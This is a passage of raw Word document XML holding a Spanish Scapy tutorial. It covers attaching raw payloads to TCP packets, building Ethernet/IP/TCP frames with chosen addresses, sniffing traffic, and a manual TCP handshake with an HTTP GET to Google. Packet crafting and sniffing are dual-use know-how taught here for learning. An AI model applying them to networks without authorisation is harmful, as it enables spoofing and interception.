        <w:t xml:space="preserve">Hasta ahora hemos visto cómo crear paquetería simple con 2 capas vamos ahora a añadir carga a un paquete TCP lo podemos denominar “Payload”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C1">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C2">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3095625" cy="371475"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="8" name="image35.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image35.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3095625" cy="371475"/>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contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C4">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="2947988" cy="3190875"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="33" name="image70.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image70.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2947988" cy="3190875"/>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contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C6">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Como vemos en la imagen podemos añadir carga en “crudo”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C7">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C8">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="2257425" cy="1019175"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="35" name="image72.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image72.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId30"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2257425" cy="1019175"/>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contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CA">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ahora es el momento de encapsular las 3 capas fundamentales del modelo OSI, será la trama-paquete-segmento que sería equivalente a Ethernet-Ip-transporte. Lo que se plantea a continuación es montar una trama en el que hay que indicar la MAC de origen, la MAC de destino, IP de origen, IP de destino y números de puerto. Aparte si se desea también se puede añadir carga.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CB">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CC">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CD">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5734050" cy="1257300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="37" name="image75.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image75.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId31"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5734050" cy="1257300"/>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contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5734050" cy="203200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="15" name="image46.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image46.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId32"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5734050" cy="203200"/>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contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D0">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Hasta el momento hemos aprendido a capsular paqueterías de forma sencilla y a enviarla pero aun no tenemos muy claro cómo se estructura la paqueteria en una trama. Scapy incluye algunos modos que permiten graficar y generar documentación del formato de cada uno de los PDU. La paquetería necesaria para realizar la siguiente práctica es la siguiente:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D1">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D2">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3133725" cy="1019175"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="20" name="image51.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image51.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId33"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3133725" cy="1019175"/>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contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D4">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Una vez instalados los módulos necesarios para graficar podemos realizar la siguiente prueba: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D5">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Utilizando el sniffer de scapy capturamos paquetería de la red.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Una vez obtenemos la paqueteria seleccionamos unos de los paquetes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Una vez tenemos el objeto paquete utilizaremos el PDF DUMP para que nos muestre una representación gráfica que relaciona el bloque hexadecimal de la trama con cada uno de sus valores expresados en ASCII.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D9">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A continuación se ven las imagenes de este proceso:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DA">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DB">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5253038" cy="2838450"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="16" name="image47.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image47.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId34"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5253038" cy="2838450"/>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contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DD">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ejercicio: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Realiza el montaje de uno o varios paquetes contra un servicio en el puerto 80 (HTTP) que tenga una carga de tipo HTTP GET.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DE">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DF">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you want to do a full three-way handshake, you'll have to do it manually.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E0">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Start with your SYN packet:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E1">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;&gt;&gt; syn = IP(dst='www.google.com') / TCP(dport=80, flags='S')</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">&gt;&gt;&gt; syn</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">&lt;IP  frag=0 proto=tcp dst=Net('www.google.com') |&lt;TCP  dport=www flags=S |&gt;&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E2">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then receive the SYN-ACK packet from the server, sr1 works. Then send your HTTP GET request:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E3">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;&gt;&gt; syn_ack = sr1(syn)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Begin emission:</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Finished to send 1 packets.</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">*</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Received 1 packets, got 1 answers, remaining 0 packets</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">&gt;&gt;&gt; syn_ack</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">&lt;IP  version=4L ihl=5L tos=0x0 len=44 id=424 flags= frag=0L ttl=55 proto=tcp chksum=0x2caa src=74.125.226.148 dst=10.20.30.40 options=[] |&lt;TCP  sport=www dport=ftp_data seq=3833491143 ack=1 dataofs=6L reserved=0L flags=SA window=5720 chksum=0xd8b6 urgptr=0 options=[('MSS', 1430)] |&lt;Padding  load='\x00\x00' |&gt;&gt;&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E4">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then set your TCP sequence and ack numbers and send the GET:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E5">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">getStr = 'GET / HTTP/1.1\r\nHost: www.google.com\r\n\r\n'</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">request = IP(dst='www.google.com') / TCP(dport=80, sport=syn_ack[TCP].dport,</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">             seq=syn_ack[TCP].ack, ack=syn_ack[TCP].seq + 1, flags='A') / getStr</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">reply = sr1(request)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E6">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E7">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="6100763" cy="1943100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1" name="image21.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image21.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId35"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6100763"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contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E9">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5972175" cy="823913"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="27" name="image58.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image58.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId36"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5972175" cy="823913"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EA">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A partir de la documentación encontrada vemos que es viable realizar el envío de un paquete de tipo HTTP GET. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EB">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Este ejercicio se compone de 3 partes fundamentales:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EC">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
